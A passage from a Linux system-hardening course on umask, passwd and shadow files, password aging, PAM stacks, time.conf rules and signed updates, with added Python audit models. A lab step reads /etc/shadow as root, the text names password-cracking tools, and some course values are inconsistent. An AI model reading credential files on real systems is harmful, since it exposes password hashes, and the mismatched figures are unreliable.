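    r w x s t; action: + or -) to an existing mode and return the new mode.
    Unlike an octal argument, + and - only add to or clear the bits present."""
    for clause in spec.split(","):
        i = 0
        while i < len(clause) and clause[i] in "ugoa":
            i += 1
        who = set(clause[:i]) or {"a"}      # no who given means everyone
        if "a" in who:
            who = {"u", "g", "o"}
        if i == len(clause) or clause[i] not in "+-":
            raise ValueError(f"bad clause: {clause!r}")
        adding = clause[i] == "+"
        bits = 0
        for perm in clause[i + 1:]:
            if perm not in "rwxst":
                raise ValueError(f"unknown permission {perm!r}")
            for name, shift, special, _letter in TRIPLES:
                if name not in who:
                    continue
                if perm in RWX:
                    bits |= RWX[perm] << shift
                elif perm == "s" and name in ("u", "g"):
                    bits |= special             # u+s is SetUID, g+s is SetGID
                elif perm == "t" and name == "o":
                    bits |= special             # sticky bit, set via o or a
        mode = (mode | bits) if adding else (mode & ~bits)
    return mode & 0o7777


def special_bits(mode: int) -> list:
    """Names of the special bits set, in the order the course table lists them."""
    names = []
    if mode & stat.S_ISGID:
        names.append("GID")
    if mode & stat.S_ISUID:
        names.append("UID")
    if mode & stat.S_ISVTX:
        names.append("Sticky Bit")
    return names


if __name__ == "__main__":
    for octal in (0o777, 0o1777, 0o2777, 0o4777, 0o7777, 0o4644):
        print(f"{octal:04o} {mode_to_string(octal)} {special_bits(octal)}")
    print(f"{apply_symbolic(0, 'u+rwx,g+rwx,o+r'):04o}")      # 0774, same as chmod 774
    print(f"{apply_symbolic(0o755, 'u+rwx,g+rwx,o+r'):04o}")  # 0775, o's x survives
```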

The umask Command

Whenever a user creates a file or directory, Linux must have a system of assigning the initial permissions to that object. The system that Linux uses is called a mask. The mask is set using a command called umask. The mask is the complement of the octal value that is assigned as permissions to an object.

Here are several examples:

• If the permissions of a file are 664, the mask value is 002.

• If the permissions of a file are 666, the mask value is 000.

• If the permissions of a file are 663, the mask value is 003.

Looking at this in reverse, if you have a mask of 662, the effective permissions are 004. If you have a mask of 066, the permissions are 600.

The default umask value can be set for all users in the /etc/bashrc file. By default, the lines that determine the umask setting look like this:

if [ "`id -gn`" = "`id -un`" -a `id -u` -gt 99 ]; then
    # ordinary user whose primary group is their own private group
    umask 002
else
    # root and system accounts
    umask 022
fi

The lines mean that any user with a UID greater than 99 will get a umask value of 002. Any user with a UID less than 99, including root and system accounts, will get a umask value of 022. Remember that when new users are created, their UIDs start at 500, ensuring that all normal users of the system will get a umask value of 002 as their default. The effective setting of this is the complement octal value, which is 664. A setting of 664 means the user will have rw-, the group will have rw-, and the others will have r--.

This may or may not be suitable for your environment, but it is recommended—from a security perspective—that this be changed, because it is not advisable to have all files readable by everyone (the others). For this reason, it is suggested that the permissions be changed so that all UIDs greater than 99 use a mask of 006, and that all UIDs less than 99 use a mask of 066. To restrict other group members from being able to write to all files while allowing all read access, you could use the mask 022.
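Below is an added Python model of the umask rule (not course code). It encodes the /etc/bashrc condition, the recommended masks, and the "readable by others" property this section warns about. It also makes one detail visible: the kernel applies a mask by clearing bits (mode & ~umask), not by subtraction. For the masks 002, 022, 006 and 066 used here the two readings agree; a mask such as 003 applied to a new file still gives 664, because a mask can never add the execute bit the kernel did not request.

```python
"""Added example: how a umask turns into a new object's permissions.
Not course code. The kernel clears the mask bits: mode & ~umask."""
import os
import stat
import tempfile

FILE_REQUEST = 0o666  # what the calls that create a regular file ask for
DIR_REQUEST = 0o777   # what mkdir asks for


def effective_mode(requested: int, umask: int) -> int:
    """Permissions an object receives when created under umask."""
    return requested & ~umask & 0o777


def bashrc_umask(uid: int, user_name: str, group_name: str, threshold: int = 99) -> int:
    """The /etc/bashrc rule above: private-group users above the UID
    threshold get 002, everyone else (root, system accounts) gets 022."""
    if group_name == user_name and uid > threshold:
        return 0o002
    return 0o022


def hardened_umask(uid: int, threshold: int = 99) -> int:
    """The lesson's recommendation: 006 above the threshold, 066 at or below it."""
    return 0o006 if uid > threshold else 0o066


def readable_by_others(mode: int) -> bool:
    """The property the lesson wants to avoid in a default file mode."""
    return bool(mode & stat.S_IROTH)


def observe(umask: int) -> tuple:
    """Create a file and a directory under umask in a scratch directory and
    return their actual modes, the way Mask.test is inspected in the task."""
    previous = os.umask(umask)
    try:
        with tempfile.TemporaryDirectory() as scratch:
            file_path = os.path.join(scratch, "Mask.test")
            dir_path = os.path.join(scratch, "Mask.dir")
            with open(file_path, "w"):
                pass
            os.mkdir(dir_path)
            return (stat.S_IMODE(os.stat(file_path).st_mode),
                    stat.S_IMODE(os.stat(dir_path).st_mode))
    finally:
        os.umask(previous)


if __name__ == "__main__":
    for uid, name, group in ((0, "root", "root"), (500, "User1", "User1")):
        default = bashrc_umask(uid, name, group)
        file_mode = effective_mode(FILE_REQUEST, default)
        hardened = effective_mode(FILE_REQUEST, hardened_umask(uid))
        print(f"{name}: umask {default:03o} -> file {file_mode:03o}, "
              f"others can read: {readable_by_others(file_mode)}; "
              f"hardened umask {hardened_umask(uid):03o} -> file {hardened:03o}")
    print(observe(0o022))  # (0o644, 0o755) on Linux
```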

In previous versions of Red Hat Linux, the default umask value was set in the /etc/profile file, and the UID threshold was 14.


TASK 3B-4
Configuring umask Settings

Setup: You are logged on to Red Hat 8 as root.

1. In your home directory, create a new file called Mask.test.

2. View the permissions for the new file. If necessary, close the Properties window.

3. Navigate to the /etc/bashrc file, and make a copy of it.

4. Use a text editor (for instance, gedit) to open the /etc/bashrc file. Viewthe umask settings.

5. Change the settings for UID greater than 99 to 006, and change the settings for UID less than 99 to 046 to follow the recommendations outlined in the previous Concepts section.

6. Close the /etc/bashrc file.

7. Log out and then log back in as root.

8. In your home directory, create a new file called Mask2.test.

9. Compare the permissions of the two test documents to verify the new umask settings are in effect.

10. Return the umask settings in the /etc/bashrc file to their defaults. You can either re-edit the changed file, or delete the changed file and rename the backup that you made earlier in this task.

11. Close all open windows.

Password Security

All user accounts in Linux require a password. However, there is no default method in place that prevents the password from being blank, often referred to as a null password. In order for an account to be authenticated by the system, the user name and password provided during the login session must match the information stored in the system.

During the installation of Linux, the default method of handling passwords is to use Message Digest 5 (MD5) encryption. If you choose not to use MD5 during installation—a practice that is not recommended—the system will default to Data Encryption Standard (DES) encryption for the passwords. DES limits passwords to eight alphanumeric characters (meaning no punctuation or special characters), which creates an encryption of only 56 bits. This is described as only 56 bits because modern computers can crack a 56-bit password very quickly, even if the method used is brute-force cracking.


Password File

The initial operation of UNIX in storing passwords was to have a single world-readable file that held all the passwords, in their encrypted form. Although this practice allowed for the system and applications all to have a single point of access for quick authentication of user accounts, it created a security risk.

Because the file is world-readable, all users have access to read the file. However, you do not want to alter this file to no longer be readable by everyone, because system functions and applications that are designed to use the file will no longer have access.

The root of the problem was that any user could read the file, and the password hash was plainly visible. A user could simply view the file and write down (or even copy to a floppy disk) the password hash. They could then take the hash home and run a password cracking utility on the hash. Password cracking tools like Crack and John the Ripper would make short work of this challenge, and the password would be revealed in short time.

The default location for the passwords is the /etc/passwd file. Because this file is world-readable, you can simply navigate to it and view the contents. In this file, the following line shows what a user’s entry would look like:

Account_Name:Password:UID:GID:Full_Name:Directory:Program

Where:

• Account_Name—This is the user account name used during login.

• Password—This is the hash of the user’s password. If the password is null, there will be no entry here, and the field will remain empty (::).

• UID—This is the assigned User Identification of the user account.

• GID—This is the assigned Group Identification of the user account.

• Full_Name—This can be the user’s full name, or other information, as desired.

• Directory—This is the user account’s home directory.

• Program—This defines the shell (or other program) that will run when the user account is authenticated during the login process.

You saw this file earlier in this lesson, but here it is again for your reference.

cracking: The act of breaking into a computer system.

Crack: A popular hacking tool used to decode encrypted passwords. System administrators also use Crack to assess weak passwords by novice users in order to enhance the security of the AIS.


Figure 3-16: An example /etc/passwd file on a Linux computer.

In the event that shadow passwords are used, the previous entry in the /etc/passwd file will have a significant change. Instead of the password field showing the hash of the user’s password, only a single x will be displayed. This is an indicator that shadow passwords are being used. No longer can any user learn the password hash of every other user—including root, by the way—through viewing the /etc/passwd file.

The Shadow Password File

If you accepted the default during installation, as it is highly recommended you do, then your passwords are not stored in the world-readable /etc/passwd file. They will instead be stored in a file called /etc/shadow.

The /etc/shadow file is not readable by every user of the system; it is only readable by the root account. This feature alone increases the security of the entire system considerably.

The format of the /etc/shadow file is similar to the /etc/passwd file, but the fields are different. In this file, the following line shows what a user’s entry would look like:

Account_Name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved


Where:

• Account_Name—This is the user account name used during login.

• Password—This is the hash of the password.

• Last—This is the day the password was last changed, expressed as the number of days since January 1, 1970.

• Min—This is the minimum number of days a user must wait before changing the password again.

• Max—This is the maximum number of days before a user must change the password.

• Warn—This is the number of days prior to password expiration that the user receives a warning.

• Expire—This is the number of days after a password expires that the account becomes disabled.

• Disable—This is the day the account was disabled, expressed as the number of days since January 1, 1970.

• Reserved—This is a reserved field intended for future use.

In Figure 3-17, you can see that when the /etc/shadow file is used, the /etc/passwd file is still in use. This is the reason that the fields are different. The /etc/passwd file still contains the UID and GID information, for example. The /etc/shadow file is concerned only with information tied to the account accessing the system.

Figure 3-17: An example /etc/shadow file on a Linux computer.

UNIX was released to the world in 1970; therefore, January 1, 1970, is considered the starting date of the OS.


TASK 3B-5
Viewing the Password Files

Setup: You are logged on to Red Hat 8 as root.

1. Open a Terminal Window, navigate to the /etc directory, and cat the passwd file.

2. Read the entries in the file, and determine if the shadow file is in use on your system.

3. Cat the /etc/shadow file.

4. Observe the differences between the two files.

5. Close any open windows.

Managing Passwords

Even though the shadow password file has options for the ages, such as minimum age and maximum age, of passwords, you should still manage these values to use what the security policy of your organization dictates. When the shadow password file is used, every new user account that is created refers to a configuration file called /etc/login.defs. This file contains the aging options, as well as the password length configuration. The default values in this file are as described in the following table.

Entry            Default Value    Description
PASS_MAX_DAYS    99999            The MAX_DAYS entry defines the number of days a user can go without changing his or her password. The default of 99999 is approximately 274 years, which is most likely a bit longer than what most organizations will require! If your organization requires high levels of security, this value will likely be 30 days or fewer. For most organizations, three months, listed as 90 days, is an adequate time for this value.
PASS_MIN_DAYS    0                Conversely, the MIN_DAYS value has a default of 0, and in most situations will be left at 0. This allows a user to change their password at any time.
PASS_MIN_LEN     5                The MIN_LEN entry defines the minimum length of the password. The default setting of 5 is acceptable, but increasing that value is recommended to at least 7 for higher security. Remember, a longer password (as long as the rules for strong passwords are followed: alphanumeric, special characters, punctuation, and so forth) is better than a shorter password.
PASS_WARN_AGE    7                The WARN_AGE entry defines the number of days a user will be warned about an expiring password, prior to the actual expiration date.
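As an added example (not course code), the following Python parses the /etc/passwd and /etc/shadow record layouts described above together with the /etc/login.defs keys from this table, and reports the conditions the lesson warns about: a null password, a hash left in the world-readable /etc/passwd, an account whose password never has to change, and login.defs values weaker than the recommended 90 days and 7 characters. All records are constructed for the example, and the hash values are placeholders.

```python
"""Added example (not course code): parse the /etc/passwd, /etc/shadow and
/etc/login.defs layouts from this lesson and report the weaknesses it warns
about. All records are constructed; the hash values are placeholders."""

PASSWD_FIELDS = ("account", "password", "uid", "gid", "full_name", "directory", "program")
SHADOW_FIELDS = ("account", "password", "last", "min", "max", "warn", "expire", "disable", "reserved")

# Constructed samples: User1 is shadowed with a 20-day maximum age, legacy still
# keeps its hash in passwd, guest has a null password, root never expires.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
User1:x:500:500:User One:/home/User1:/bin/bash
legacy:$1$CONSTRUCTED$placeholderhash:501:501:Legacy app:/home/legacy:/bin/bash
guest::502:502:Guest:/home/guest:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$1$CONSTRUCTED$placeholderhash:12000:0:99999:7:::
User1:$1$CONSTRUCTED$placeholderhash:12000:0:20:7:::
"""
LOGIN_DEFS_SAMPLE = """\
# constructed excerpt with the default values from the table above
PASS_MAX_DAYS\t99999
PASS_MIN_DAYS\t0
PASS_MIN_LEN\t5
PASS_WARN_AGE\t7
"""


def parse_records(text: str, fields: tuple) -> dict:
    """Split colon-separated records into dicts keyed by account name."""
    records = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(fields):
            raise ValueError(f"expected {len(fields)} fields: {line!r}")
        record = dict(zip(fields, parts))
        records[record["account"]] = record
    return records


def parse_login_defs(text: str) -> dict:
    """KEY<whitespace>VALUE lines; '#' starts a comment."""
    values = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            parts = line.split(None, 1)
            values[parts[0]] = parts[1] if len(parts) > 1 else ""
    return values


def audit(passwd_text: str, shadow_text: str, login_defs_text: str,
          max_days_policy: int = 90, min_len_policy: int = 7) -> list:
    """Return (subject, finding) pairs for the conditions this lesson warns about."""
    findings = []
    passwd = parse_records(passwd_text, PASSWD_FIELDS)
    shadow = parse_records(shadow_text, SHADOW_FIELDS)
    for name, rec in passwd.items():
        if rec["password"] == "":
            findings.append((name, "null password: the account logs in with no password"))
        elif rec["password"] != "x":
            findings.append((name, "hash stored in world-readable /etc/passwd"))
        elif name not in shadow:
            findings.append((name, "marked shadowed but missing from /etc/shadow"))
    for name, rec in shadow.items():
        if rec["password"]  == "":
            findings.append((name, "null password in /etc/shadow"))
        elif rec["password"].startswith(("!", "*")):
            continue  # locked or no-login account; aging does not apply
        max_days = int(rec["max"]) if rec["max"] else None
        if max_days is None or max_days > max_days_policy:
            findings.append((name, f"maximum password age {max_days} exceeds {max_days_policy} days"))
    defs = parse_login_defs(login_defs_text)
    if int(defs.get("PASS_MAX_DAYS", 99999)) > max_days_policy:
        findings.append(("login.defs", f"PASS_MAX_DAYS {defs.get('PASS_MAX_DAYS')} exceeds {max_days_policy}"))
    if int(defs.get("PASS_MIN_LEN", 0)) < min_len_policy:
        findings.append(("login.defs", f"PASS_MIN_LEN {defs.get('PASS_MIN_LEN')} is below {min_len_policy}"))
    return findings


if __name__ == "__main__":
    for subject, finding in audit(PASSWD_SAMPLE, SHADOW_SAMPLE, LOGIN_DEFS_SAMPLE):
        print(f"{subject}: {finding}")
```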

Password aging can also be managed in Red Hat User Manager.


TASK 3B-6
Managing Passwords

Setup: You are logged on to Red Hat 8 as root.

1. Open the /etc/login.defs file in a text editor.

2. Change PASS_MAX_DAYS to 20, leave PASS_MIN_DAYS at 0, change PASS_MIN_LEN to 7, and leave PASS_WARN_AGE at 7.

3. Save the file and close the editor.

Pluggable Authentication Modules (PAM)

As the UNIX and Linux operating systems evolved, the introduction of the shadow password file allowed for greater security in regards to passwords. However, as new and more advanced systems of authentication, such as Smart Cards, are introduced, this solution also has the potential to create problems. It would be very inefficient to recompile all applications to use each and every new form of authentication that is brought into the OS. For example, FTP would have to be made aware of a user authenticating by using a Smart Card, instead of by using the traditional user account name and password.

So, how do these programs know that a new authentication scheme is being used, such as the shadow password file instead of the traditional password file? The answer is Pluggable Authentication Modules (PAM). Applications only need to be PAM-aware, or compiled to know and use PAM for authentication purposes.

PAM enables the program designer to ignore the authentication method used. No longer does the designer need to worry about creating unique versions of an application for each authentication method, nor to recompile an application every time a new authentication scheme is introduced.

The directory that holds the PAM configuration files is /etc/pam.d/. In this directory, there will be unique files that define the specific requirements for a program that is PAM-aware. Although these files are designed to function properly when installed, you might want to change them. If you do want to alter these configuration files, it is important to understand their structure.

PAM Configuration Files

One of the first things you might notice if you look into the details of the configuration files is that the names of the files are based on the services that an application requires, not the name of the application itself. In some instances, this is the same, such as the login application using the login service. However, you will also see differences, such as the wu-ftp application using the ftp service. This means that, in the /etc/pam.d/ directory, you will see a file for login and a file for ftp, but not a file for wu-ftp.

These configuration files take advantage of the modular format of PAM to provide the authentication services for their applications. The files contain calls to these modules, which are usually located in the /lib/security directory. Each line in the configuration file defines a module type, a control flag, a path to the module, and module arguments (this is an optional component, not in every line).


PAM Modules

There are four distinct PAM module types. Each type is relative to a specific part of the authentication process. The four types are:

• auth—This module is used to authenticate the user. This can be done in a variety of ways, including requesting and verifying user name and password.

• account—This module is used to verify that access is allowed. This can include checking the user account status, for expiration, or time-of-day restrictions.

• password—This module is used to set or change passwords.

• session—This module is used once a user has been authenticated to manage the session. This might include refreshing session tokens.

Any one module has the ability to address more than one module type. A module may go so far as to have all four types. In the configuration file, the module type will be the first item that is detailed. The format of the lines in the configuration file is as follows:

Module-Type Control-Flag Module-Path Module-Arguments

An example of such a line is the following line, from the rlogin configuration file:

auth required /lib/security/pam_nologin.so

In this example, the module type is auth, the control flag is required, the module path is /lib/security/pam_nologin.so, and there are no arguments presented.

You have seen the module types defined, and the path is self-explanatory at this stage. The remaining component of this line that requires discussion is the control flag. The control flag in this example is required. There are four possible control flags:

• Required—This flag states that the module must be checked successfully forthe authentication to be allowed. In the event that the module checks and theauthentication fails, the user is not informed until all modules have beenchecked.

• Requisite—This flag states that the module must be checked successfully forthe authentication to be allowed. In the event the check fails, the user isinformed immediately; with a message stating the failure was Required orRequisite.

• Sufficient—This flag states that if the user is successfully authenticated, andthere have been no Required flag failures, the authentication process is con-sidered complete, the user is authenticated, and no other modules arechecked.

• Optional—This flag is not used very often. If the module check is a successor a failure, then this flag has no role to play. It is only when no other mod-ules have determined a success or a failure that this flag is used. In that case,the overall PAM authentication for the module type is used.

By combining the module types and the control flags, modules can be stacked toprovide a very specific authentication package. The order of the modules stackedis significant, as the system executes the modules from the top down. Stackingthese modules enables the administrator to define a group of conditions that mustbe met in order for authentication to be successful. The following example ofstacked modules is the rlogin configuration file:


auth required /lib/security/pam_nologin.so
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_env.so
auth sufficient /lib/security/pam_rhosts_auth.so
auth required /lib/security/pam_stack.so service=system-auth

By reading this stack, you can determine the following details of the configuration file:

• Line one—PAM will verify that the /etc/nologin file does not exist.

• Line two—PAM will verify that the user is not trying to log in remotely as root over an unencrypted network connection.

• Line three—PAM will load any environment variables that are defined.

• Line four—PAM will attempt rhosts authentication; if it succeeds, the connection is allowed and authentication is complete.

• Line five—PAM will use standard user name and password authentication. (This line is checked only if the previous line was not successful.)

Security with PAM

One way that PAM can be used to increase the security of the system is with the other configuration file. This file—found at /etc/pam.d/other—is what the system uses when it cannot find a configuration file for a specific application. The default configuration of this file is as follows:

auth required /lib/security/pam_deny.so
account required /lib/security/pam_deny.so
password required /lib/security/pam_deny.so
session required /lib/security/pam_deny.so

This is the equivalent of stating that unless there is a configuration file that can grant access, deny everyone. The pam_deny.so module will always produce a failure, and because this configuration file includes pam_deny.so for all four types, a failure will always be the end result of checking this file.
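To make the control-flag semantics concrete, here is an added evaluator (constructed for this guide, not PAM's own code and not part of the original text) that parses pam.d-style lines and walks a stack top-down with the required, requisite, sufficient and optional rules described above. Module outcomes are supplied as a constructed dictionary in place of actually running the modules, and the rlogin and other stacks are embedded as constructed copies.

```python
"""Constructed model of PAM control-flag evaluation (not PAM's own code).

Each stack line is 'module-type control-flag module-path [arguments]',
as in /etc/pam.d/rlogin.  Instead of running modules, the caller
supplies the pass/fail outcome of each module path.
"""

# The rlogin stack from the text (constructed copy for this example).
RLOGIN_STACK = """
auth required   /lib/security/pam_nologin.so
auth required   /lib/security/pam_securetty.so
auth required   /lib/security/pam_env.so
auth sufficient /lib/security/pam_rhosts_auth.so
auth required   /lib/security/pam_stack.so service=system-auth
"""

# The default /etc/pam.d/other file from the text (constructed copy).
OTHER_STACK = """
auth     required /lib/security/pam_deny.so
account  required /lib/security/pam_deny.so
password required /lib/security/pam_deny.so
session  required /lib/security/pam_deny.so
"""


def parse_stack(text):
    """Return a list of (type, flag, path, args) tuples, skipping blanks and comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 3:
            raise ValueError("malformed PAM line: %r" % raw)
        entries.append((fields[0], fields[1].lower(), fields[2], fields[3:]))
    return entries


def evaluate(stack, module_type, outcomes):
    """Walk one module type of a stack top-down.

    outcomes maps module path -> True (success) / False (failure).
    Returns (authenticated, consulted); consulted lists the module paths
    that were actually checked, which makes the 'sufficient' short-circuit
    and the 'requisite' early exit visible.
    """
    required_failed = False
    decisive_seen = False      # a required/requisite module has been checked
    optional_result = None
    consulted = []
    for mtype, flag, path, _args in stack:
        if mtype != module_type:
            continue
        ok = outcomes.get(path, False)   # a module that cannot run counts as a failure
        consulted.append(path)
        if flag == "required":
            decisive_seen = True
            if not ok:
                required_failed = True   # keep going: the user is not told which module failed
        elif flag == "requisite":
            decisive_seen = True
            if not ok:
                return False, consulted  # fail immediately
        elif flag == "sufficient":
            if ok and not required_failed:
                return True, consulted   # done: nothing below this line is checked
        elif flag == "optional":
            if optional_result is None:
                optional_result = ok
        else:
            raise ValueError("unknown control flag: %r" % flag)
    if decisive_seen:
        return (not required_failed), consulted
    if optional_result is not None:
        return optional_result, consulted   # only optional modules spoke
    return False, consulted                 # nothing granted access


if __name__ == "__main__":
    stack = parse_stack(RLOGIN_STACK)
    # Trusted rhosts entry: pam_rhosts_auth succeeds, so pam_stack is never consulted.
    print(evaluate(stack, "auth", {
        "/lib/security/pam_nologin.so": True,
        "/lib/security/pam_securetty.so": True,
        "/lib/security/pam_env.so": True,
        "/lib/security/pam_rhosts_auth.so": True,
    }))
```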


The Red Hat Linux distribution includes many other PAM modules that have an effect on the security of the system. The following is just a partial listing of the modules available in the system, with a brief description of what they do and/or how they can be used:

• pam_access—This checks for access information, such as account expiration.

• pam_cracklib—This checks the strength of passwords.

• pam_deny—This denies all access.

• pam_group—This sets permissions based on /etc/group and other configurable options.

• pam_lastlog—This displays information about the last user logged in.

• pam_limits—This sets limits on resources.

• pam_nologin—This denies login based on /etc/nologin.

• pam_permit—This always allows access (it's the inverse of the pam_deny module).

• pam_rhosts_auth—This uses the rhosts authentication of rlogin/rsh.

• pam_securetty—This uses the authentication of /etc/securetty.

• pam_tally—This tracks login attempts, and allows for locking of accounts after a defined number of failed attempts.

• pam_time—This allows for time-based controls on applications and services.

• pam_wheel—This defines authentication based on the user account belonging to the wheel group.

Securing Access with PAM

One of the tasks you will likely want to perform is to control access to objects or to the system based on time. For example, your corporate security policy might state that users are not allowed to log in when the office is closed. You can implement this policy by using the module pam_time, found at /lib/security/pam_time.so. This module can control access based on any of the following elements:

• The user account name.

• The time of day.

• The day of the week.

• The service the user account is requesting to use.

• The terminal where the request originates.


The execution of the pam_time module is based on the associated configuration file. For the time restrictions, the configuration file is /etc/security/time.conf. The fields in this configuration file are:

• services—This field is the actual service that is to have time restrictions enforced. A very common example of this is the login service. In the event that there are multiple services, such as login and su, in the configuration field, this is listed as login&su.

• ttys—This field is the terminal that is to have time restrictions enforced. ttyp* will enforce the restrictions on all remote terminal connections, such as Telnet. tty* will enforce the restrictions on all console terminal connections.

• users—This field defines the users affected by the time restrictions. If you want the restrictions to affect all users, substitute the * character in this location.

• time—This field defines the actual times that are going to be restricted. The times are entered using the 24-hour clock format, where 11:00 A.M. to 3:00 P.M. is 1100-1500. Also defined in this field are day entries, if the restrictions are based on the day of the week. Days are defined by their first two letters—Monday is Mo, Wednesday is We, and so on. If you want to restrict all days of the week, you can use the two letters Al; if you want to restrict only weekdays, you can use the two letters Wk; and if you want to restrict only weekends, you can use the two letters Wd.

The fields are input with the use of four special characters: the exclamation point (!), the pipe symbol (|), the ampersand (&), and the asterisk (*).

• The ! character means NOT. An example is !root, meaning not root, or except root.

• The | character means OR. An example is User1|User2, meaning User1 or User2.

• The & character means AND. An example is User1&User2, meaning both User1 and User2.

• The * character is a wildcard. An example is log*, meaning everything that starts with log. The * character, when used in the users field, means all user accounts.

By combining these characters and options, you can create a line in the /etc/security/time.conf file that restricts access according to your policy. The following example shows a line that restricts access. No user other than User1 is allowed to log in to the system (by using either remote or console access) between the hours of 9:00 P.M. and 5:00 A.M., every day of the week.

login;tty*;*!User1;!Al2100-0500

The second example is similar to the first. However, in this example, users are restricted from using a remote terminal connection, but they are allowed to use a console connection to gain access to the system. The same user and hour restrictions are in place.

login;ttyp*!tty*;*!User1;!Al2100-0500

In this final example, all users except for root are denied access to the console login at all times.

login;tty*&!ttyp*;*!root;!Al0000-2400

When accessing your computer via the console, you are using tty*. When accessing remotely, you are using ttyp*.
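The following added evaluator (constructed for this guide, not pam_time's own code) parses time.conf rules and decides whether a login request is allowed at a given weekday and time. It uses the rule grammar from the pam_time man page, in which each term of a field may be prefixed with ! and terms are joined with & or |, so the users field is written !User1 rather than *!User1; the three rules from the text are embedded in that spelling as constructed sample data, and the console rule uses tty* & !ttyp* because the glob tty* on its own also matches pseudo-terminals such as ttyp0.

```python
"""Constructed model of /etc/security/time.conf evaluation (not pam_time's own code).

Rule format: services;ttys;users;times
Each field is a logic list: terms joined by & (and) or | (or), each term
optionally prefixed with ! (not); * is a glob wildcard.  Day codes are
Mo Tu We Th Fr Sa Su, Wk (weekdays), Wd (weekend), Al (all days), followed
by HHMM-HHMM.  As in pam_time, a request is denied if a rule whose
service, tty and user terms all match has a times list that evaluates false.
"""
from fnmatch import fnmatchcase

# Constructed sample configuration based on the three rules in the text.
TIME_CONF = """
# nobody but User1 may log in between 21:00 and 05:00, console or remote
login ; tty* ; !User1 ; !Al2100-0500
# remote (ttyp*) logins only are blocked in those hours
login ; ttyp* ; !User1 ; !Al2100-0500
# console logins (tty* but not pseudo-terminals) are closed to everyone but root
login ; tty* & !ttyp* ; !root ; !Al0000-2400
"""

DAY_CODES = {
    "Mo": {0}, "Tu": {1}, "We": {2}, "Th": {3}, "Fr": {4}, "Sa": {5}, "Su": {6},
    "Wk": {0, 1, 2, 3, 4}, "Wd": {5, 6}, "Al": {0, 1, 2, 3, 4, 5, 6},
}


def _eval_logic(field, term_matches):
    """Evaluate 'a & !b | c' as an OR of AND-groups; ! negates a single term."""
    result = False
    for group in field.split("|"):
        group_ok = True
        for term in group.split("&"):
            term = term.strip()
            negate = term.startswith("!")
            if negate:
                term = term[1:].strip()
            if term_matches(term) == negate:   # matched-but-negated, or unmatched-and-plain
                group_ok = False
        result = result or group_ok
    return result


def _time_term_matches(term, weekday, hhmm):
    """'Al2100-0500' -> True if weekday/time fall in the range (wraps past midnight)."""
    days = set()
    while term[:2] in DAY_CODES:          # day codes are assumed to precede the range
        days |= DAY_CODES[term[:2]]
        term = term[2:]
    start, end = (int(part) for part in term.split("-"))
    if weekday not in days:
        return False
    if start <= end:
        return start <= hhmm < end
    return hhmm >= start or hhmm < end     # e.g. 2100-0500 spans midnight


def parse_rules(text):
    """Return a list of (services, ttys, users, times) field strings."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = [f.strip() for f in line.split(";")]
        if len(fields) != 4:
            raise ValueError("malformed time.conf line: %r" % raw)
        rules.append(tuple(fields))
    return rules


def access_allowed(rules, service, tty, user, weekday, hhmm):
    """weekday: 0=Monday .. 6=Sunday; hhmm: integer such as 2130."""
    for services, ttys, users, times in rules:
        if not (_eval_logic(services, lambda t: fnmatchcase(service, t))
                and _eval_logic(ttys, lambda t: fnmatchcase(tty, t))
                and _eval_logic(users, lambda t: fnmatchcase(user, t))):
            continue   # this rule does not apply to the request
        if not _eval_logic(times, lambda t: _time_term_matches(t, weekday, hhmm)):
            return False
    return True


if __name__ == "__main__":
    rules = parse_rules(TIME_CONF)
    print(access_allowed(rules, "login", "ttyp0", "alice", 2, 2300))   # remote, 23:00
    print(access_allowed(rules, "login", "ttyp0", "User1", 2, 2300))   # exempted user
```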


Security Updates

It is a given that in the security world there will be holes found in applications, and that other security risks are going to be found. The world of security is dynamic, and it can be very difficult for an administrator to keep up-to-date with all the newest exploits and/or attacks against systems.

Not immune to security holes, unfortunately, is the Red Hat distribution of Linux. Red Hat, Inc., has stated its commitment to releasing updates to fix the holes as quickly as possible. Once a patch has been tested and is ready for release, it is distributed to the public as an official Red Hat errata update. When you are downloading updates, be sure to check the published signature of the file, and compare it to the signature of the file you downloaded. It is common for an attacker to create a Trojan version of an update, which contains a new security hole.

There are two methods for obtaining security updates. One is through the Red Hat Network, and the other is through official errata.

The Red Hat Network

The Red Hat Network provides for an automated updating process. The system can check your system, determine the needed updates, download the update, verify the signature of the update, and even perform the install automatically. If you do not want the update to install automatically, you can schedule the installs at a time you determine.

In order for the Red Hat Network update system to work, each computer that you want to have updated will have to create a system profile. The system profile identifies the computer using software and hardware information, and the information is kept confidential.

When the Red Hat Network determines your system needs an update, you can be notified via email. In order to apply the update, there is a program called Red Hat Update Agent. More information about this process can be found at http://rhn.redhat.com.

Security Errata

Red Hat issues security errata reports, as they are published, on the Red Hat Linux Errata Web site www.redhat.com/apps/support/errata. Here, you can select a product and display the security updates that are unique to that product. This saves you the time of sorting through all the updates to find the ones of relevance to you.

All official Red Hat Security Errata updates are signed with the Red Hat, Inc., GPG key. Red Hat 8.0 will automatically attempt to verify the GPG signature before installing an RPM. If you do not have the key installed, it can be found on the Red Hat CD-ROM. The key can be imported to a keyring by using the following command:

rpm --import /mnt/cdrom/RPM-GPG-KEY

Once it is installed, you will want to verify the key. To display all keys installed for further RPM verification, use the following command:

rpm -qa gpg-pubkey*

For the Red Hat, Inc., key, you should see the following output:

gpg-pubkey-db42a60e-37ea5438

attack: An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.


Once you have verified the GPG signature of the update, you can be sure that the contents are official and have not been modified.

Topic 3C

Access Control

In Linux, configuring access control can be accomplished by using TCP wrappers and the xinetd superdaemon. To start, let's look at TCP wrappers.

TCP Wrappers

Firewalls and other perimeter protection schemes provide an excellent means of protecting the entire network from attacks. There will be times when you want more granular control, and want to control access to and from individual services on a single computer. Linux provides the ability to do this at the machine, enabling you to create an additional layer of security at the source of the service. This ability is provided with TCP wrappers and the xinetd daemon. The history behind the TCP wrappers program is worth noting.

